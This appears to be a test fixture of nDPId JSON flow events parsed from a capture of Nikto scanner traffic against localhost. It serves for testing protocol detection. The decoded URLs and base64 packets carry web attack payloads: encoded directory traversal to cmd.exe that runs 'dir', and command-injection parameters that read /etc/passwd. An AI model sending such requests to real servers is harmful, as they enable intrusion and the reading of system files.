+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_packet_id":1,"flow_last_seen":1576420277882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":266,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":266,"pkt_l4_len":232,"thread_ts_msec":1576420277882,"pkt":"AAAAAAAAAAAAAAAACABFAAD8MthAAEAGCSJ\/AAABfwAAAcdcH5B7UwvpG4XAvoAYAED+8AAAAQEICp1m\/6GdZv+hR0VUIC9fdnRpX2Jpbi8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":737,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277882,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%c0%af..\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003199)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1576420277883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277883,"pkt":"AAAAAAAAAAAAAAAACABFAADcUThAAEAG6uF\/AAABfwAAAcdeH5DOhWgJaQI1xYAYAED+0AAAAQEICp1m\/6OdZv+jR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9Y2F0JTIwL2V0Yy9wYXNzd2QgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":738,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277883,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003216)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1576420277885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277885,"pkt":"AAAAAAAAAAAAAAAACABFAADVkAVAAEAGrBt\/AAABfwAAAcdgH5ANV6k94mK\/lYAYAED+yQAAAQEICp1m\/6WdZv+lR0VUIC9hZG1pbi9zeXN0ZW0ucGhwMz9jbWQ9ZGlyJTIwYzpcXCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzIxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":739,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277885,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/system.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003217)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7560000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1576420277887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":232,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":232,"pkt_l4_len":198,"thread_ts_msec":1576420277887,"pkt":"AAAAAAAAAAAAAAAACABFAADawa5AAEAGem1\/AAABfwAAAcdiH5DPxPiU5alglIAYAED+zgAAAQEICp1m\/6edZv+nR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWNhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01086{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7560000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420277887,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003218)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1576420277889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277889,"pkt":"AAAAAAAAAAAAAAAACABFAADTtGFAAEAGh8F\/AAABfwAAAcdkH5BoGo0gUvgPHYAYAED+xwAAAQEICp1m\/6mdZv+pR0VUIC9hZG1pbi9leGVjLnBocDM\/Y21kPWRpciUyMGM6XFwgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277889,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin\/exec.php3?cmd=dir%20c:\\\\","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003219)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1576420277890,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277890,"pkt":"AAAAAAAAAAAAAAAACABFAADHrzRAAEAGjPp\/AAABfwAAAcdmH5C4mZZz5s98MYAYAED+uwAAAQEICp1m\/6qdZv+qR0VUIC9pc2FwaS90c3Rpc2FwaS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI2MykNCg0K"} 
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277890,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/isapi\/tstisapi.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003263)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1576420277892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277892,"pkt":"AAAAAAAAAAAAAAAACABFAADhOMJAAEAGA1N\/AAABfwAAAcdoH5DDTQGCjXG7iYAYAED+1QAAAQEICp1m\/6ydZv+sR0VUIC9jZXJ0c3J2Ly4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5NCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277892,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003294)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1576420277893,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1576420277893,"pkt":"AAAAAAAAAAAAAAAACABFAADvSZpAAEAG8mx\/AAABfwAAAcdqH5B\/BnDaXNCp24AYAED+4wAAAQEICp1m\/62dZv+tR0VUIC9jZ2ktYmluLy4uJTI1NWMuLiUyNTVjLi4lMjU1Y3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk1KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01108{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1576420277895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277895,"pkt":"AAAAAAAAAAAAAAAACABFAADqfTRAAEAGvtd\/AAABfwAAAcdsH5BhnER0\/MAlIYAYAED+3gAAAQEICp1m\/6+dZv+vR0VUIC9paXNhZG1wd2QvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7560000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1576420277896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":258,"pkt_l4_len":224,"thread_ts_msec":1576420277896,"pkt":"AAAAAAAAAAAAAAAACABFAAD0gMpAAEAGuzd\/AAABfwAAAcduH5Bs5rmLXk\/vk4AYAED+6AAAAQEICp1m\/7CdZv+wR0VUIC9tc2FkYy8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7560000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 